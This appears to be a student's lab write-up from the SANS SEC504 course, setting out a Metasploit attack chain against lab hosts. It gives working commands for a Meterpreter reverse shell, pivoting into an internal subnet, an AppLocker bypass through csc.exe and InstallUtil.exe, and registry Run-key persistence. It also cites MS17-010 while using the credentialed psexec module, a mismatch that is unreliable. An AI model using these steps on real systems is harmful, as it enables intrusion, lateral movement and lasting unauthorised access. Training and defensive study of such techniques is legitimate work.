SEC-504: Advanced Exploitation & Post-Exploitation
In the SANS SEC504 course, I utilized Metasploit, the industry-standard penetration testing framework, to execute complex attacks. Gaining initial access is just the beginning; the “Post-Exploitation” phase is where an attacker establishes control, moves laterally, and achieves their ultimate objective.
Here is the step-by-step methodology I used.
1. Metasploit Attack & Analysis
Objective: Launch a verified exploit against a vulnerable service.
I targeted a Windows system running a vulnerable SMB service (MS17-010).
Step 1: Configuration
I searched for the module and configured the target parameters.
1
2
3
4
5
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 10.10.0.1
msf6 > set SMBUser sec504
msf6 > set SMBPass sec504
Step 2: Payload Selection
I configured a Meterpreter reverse TCP payload. Meterpreter is an advanced, in-memory payload that provides a robust command shell without touching the disk.
1
2
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.75.1
Step 3: Execution
I launched the exploit.
1
msf6 > run
Result: Meterpreter session 1 opened. I now had full system control. I used getuid to verify I was running as NT AUTHORITY\SYSTEM.
2. Pivoting and Lateral Movement
Objective: Access a hidden internal network through a compromised host.
I had access to a web server that was “dual-homed” (connected to two networks). The database server I needed to reach was on a private internal subnet (192.168.1.0/24) that my attacking machine could not reach directly.
Step 1: Autoroute
Inside the Meterpreter session on the web server, I added a route to the internal subnet. This told Metasploit to route traffic for that network through the compromised session.
1
meterpreter > run autoroute -s 192.168.1.0/24
Step 2: Port Forwarding
I used port forwarding to map a local port on my machine to the destination port on the hidden database.
1
meterpreter > portfwd add -l 3306 -p 3306 -r 192.168.1.50
Step 3: The Attack
I could now run tools against 127.0.0.1:3306 on my local machine, and the traffic was tunneled through the web server to the hidden database.
1
nmap -sV -p 3306 127.0.0.1
Result: I successfully scanned and compromised the internal database server which was previously unreachable.
3. Application Allowlist Bypass (AppLocker)
Objective: Execute arbitrary code on a system protected by AppLocker.
I encountered a system where AppLocker blocked standard executables like nc.exe or meterpreter.exe.
Step 1: Reconnaissance
I enumerated the AppLocker policy to see what was allowed.
1
Get-AppLockerPolicy -Local
Finding: The policy allowed the execution of Microsoft-signed binaries in the C:\Windows\Microsoft.NET folder.
Step 2: The “InstallUtil” Bypass
I identified two permitted binaries: csc.exe (C# Compiler) and InstallUtil.exe.
I wrote a C# wrapper (Shellcode.cs) that contained my Meterpreter shellcode but was structured as a Windows Installer class.
Step 3: Compilation & Execution
I compiled the C# code on the target machine using the trusted compiler:
1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:shellcode.exe Shellcode.cs
I then executed the payload using InstallUtil, which proxies the execution, bypassing the allowlist.
1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U shellcode.exe
Result: I received a reverse shell connection, bypassing the security controls.
4. Establishing Persistence
Objective: Maintain access even after the user reboots.
Attacking systems is noisy. Once I had a shell, I needed to ensure I could return later without re-exploiting the vulnerability.
Step 1: Persistence Module
I used a Metasploit post-exploitation module to install a backdoor.
1
2
3
4
msf6 > use post/windows/manage/persistence_exe
msf6 > set SESSION 1
msf6 > set REXEPATH /tmp/evil.exe
msf6 > run
Step 2: Verification
This created a Registry Run Key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) that automatically executes my payload (evil.exe) every time the user logs in. Even if the system reboots or the vulnerability is patched, my access remains secure.